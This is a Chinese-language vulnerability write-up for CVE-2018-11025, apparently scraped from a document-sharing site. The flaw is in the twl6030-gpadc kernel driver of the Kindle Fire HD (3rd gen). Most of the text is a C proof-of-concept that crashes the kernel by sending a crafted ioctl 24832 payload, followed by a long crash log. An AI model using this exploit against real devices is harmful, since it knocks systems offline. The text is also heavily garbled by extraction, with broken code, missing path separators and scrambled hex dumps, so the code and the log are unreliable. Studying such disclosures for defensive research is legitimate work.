《(CVE-2018-11025)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx》由会员分享,可在线阅读,更多相关《(CVE-2018-11025)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx(8页珍藏版)》请在第壹文秘上搜索。
1、(CVE-2018-11025) Amazon Kindle Fire HD (3rd) Fire OS kernel 组件安全漏洞一、漏洞简介Amazon Kindle Fire HD (3rd) Fire OS 4.5.5.3 内核组件中的内核模块 omapdriversmfdtwl6030-gpadc.c 允许攻击者通过设备/ dev / tw16030 上的 ioctl的参数注入特制的参数-gpadc命令24832并导致内核崩溃。要探索此漏洞,必须打开设备文件devtwl6030-gpadc,并使用命令24832和 精心设计的有效负载作为第三个参数在此设备文件上调用ioctl系统调用。
2、二、漏洞影响Fire OS 4.5.5.3三、复现过程poc/* This is poc of Kindle Fire HD 3rd* A bug in the ioctl interface of device file devtwl6030-gpadc cause s* the system crash via IOCTL 24832.* This Poc should run with permission to do ioctl on devtwl6030-gpad c.* */#include #include #include include const static char *
3、driver = devtwl6030-gpadc; static command = 24832;struct twl6030_gpadc_user_parms int channel;int status;unsigned short result;;int main(int argc, char *argvj char *env) struct twl6030_gpadc_user_parms payload;payload.channel = 0x9b2a9212;payload.status = 0x0;payload.result = 0x0;int fd = 0;fd = OPe
4、n(driver, O_RDWR);if (fd /data/IOCaItmplog);return -1;printf(Try ioctl device file %s, with command 0% and paylo ad NULLnj driver, command);printf(System will crash and reboot.n);if(ioctl(fdj command, &payload) datalocaltmplog);return -1;close(fd);return 0;崩溃日志18460.321624 Unable to handle kernel pa
5、ging request at virtual addres s 4b3f25fc 18460.330139 pgd = ca210000 18460.333251 4b3f25fc *pgd=0000000018460.337768 Internal error: Oops: 5 #1 PREEMPT SMP ARM18460.343810 Modules linked in: omaplfb(0) pvrsrvkm(O) pvr_logger(0)18460.351440 CPU: 0 Tainted: GO (3.4.83-gd2afc0bae69 #D18460.358825PC is
6、 at twl6030_gpadc_ioct1+0x160/0x18018460.364379LR is at twl6030_gpadc_conversion+0x5c/0x48418460.370452pc : y Ir : psr: 6003001318460.370452sp : de94dd90 ip : 00000000 fp : de94df0418460.383422rl0: 00000000 r9 : dcccf608 r8 : bea875ec18460.389282 ecr7 : de94c000 r6 : 00000000 r5 : 00006100 r4 : bea8
7、7518460.39669701r3 : fffffeb4 r2 : 4b3f2730 rl : de94dee8 r0 : 00000018460.404113 ment userFlags: ZCv IRQs on FIQs on Mode SVC_32 ISA ARM Seg18460.41204818460.418609Control: 10c5387d Table: 8a21004a DAC: 0000001518460.418609PC: 0c031b000:18460.423583b000 e24bl01c e30f3eb4 e34f3fff e0822082 e0812102
8、e51220e4 el8120b3 e597300818460.434234 b020 e294200c 30d22003 33a03000 e3530000 0a000006 e3e0000c e24bd01c e89da8f018460.444885 b040 e24b0el7el7 e3a0200c ebfced7fe3a0100cebfcf5c4eafffff8ela00004e24bl18460.455444 b060 e3500000 eb4 e34f3fff e08121020afffff3eafffffle51b2170e24bl01ce30f318460.465972 b08
9、0 e512213416c eaffffdf c0acabbcel8120b3eaffffe303e0303c150b016c050b318460.476623 b0a0 ela0c00d0ec 03e00012 e89da800e92dd800e24cb004e59030e0e35300001590018460.487182 b0c0 ela0c00d00d e92dd800 e24cb004e92dd800e24cb004e59000fe89da800elac18460.497863 b0e0 e5d020e900d e92dd800 e24cb0045d030e8el820003e200
10、0003e89da800elac18460.50854418460.508544 LR: 0c031a8d0:18460.513519 a8d0 e89da87800a 03a00000 e89da878ela00004ebffff20e2000003e350000213e0018460.524078 a8f C09ba0c0 000 0a000114 e59f5454ela0c00de92ddff0e24cb004e24dd014e250918460.534759 a910 e595008c 0b6 e3510001 9a00000ae35000000a00010be2800004eb0el
11、ffeld9118460.545318 a930 e595308c08c e28a0004 eb0elf69e3e06015e59fl42ce5930000ebff4e6be595a18460.555999 a950 ela00006193 e5933038 e3530000e24bd028e89daff0e595a08c3a03f52e023a18460.566680 a970 13e0600f 010 e08c7008 la0000253e59a32c4e0818101e595c088e313018460.577331 a990 e35100000b6 e3540000 0a0000bc0
12、a0000c4eld930b8e35300010a0000d7eld9418460.587890 a9b e3a0000e 001 0a0000dl eld920b6e3a01002e3a02090e5956088ebfff8bce354018460.59857118460.598571 SP: 0de94ddl0:18460.603546 ddl0 00000000080 60030013 ffffffff0000000dde94dda010624dd3de94dd4cc031b18460.614196 dd30 de94dd7c370 00000001 de94dee8bea875ecde
13、94df04de94dd48C06a5318C000818460.624877 dd50 4b3f2730000 bea875ec dcccf608fffffeb4bea875ec0000610000000000de94c18460.635528 dd70 00000000080 60030013 ffffffffde94df0400000000de94dd90C031a950c031b18460.646087 dd90 de94ddac 8fc 00000000 000000009b2a92120000000000000000000400000001f18460.656738 ddb0 C00795a02bc de94de0c de94ddd800000001de94ddd4de94ddc8C00795b4C007918460.667419 ddd0 C0070df8 8f4 60000013 00000001C00795acde94c0000000000100000004dd32f18460.678100 ddf0 0000000100000004dd32f8000000000000000000de94del0 C00723a0 C06a4818 18460.68862918460.688659 FP: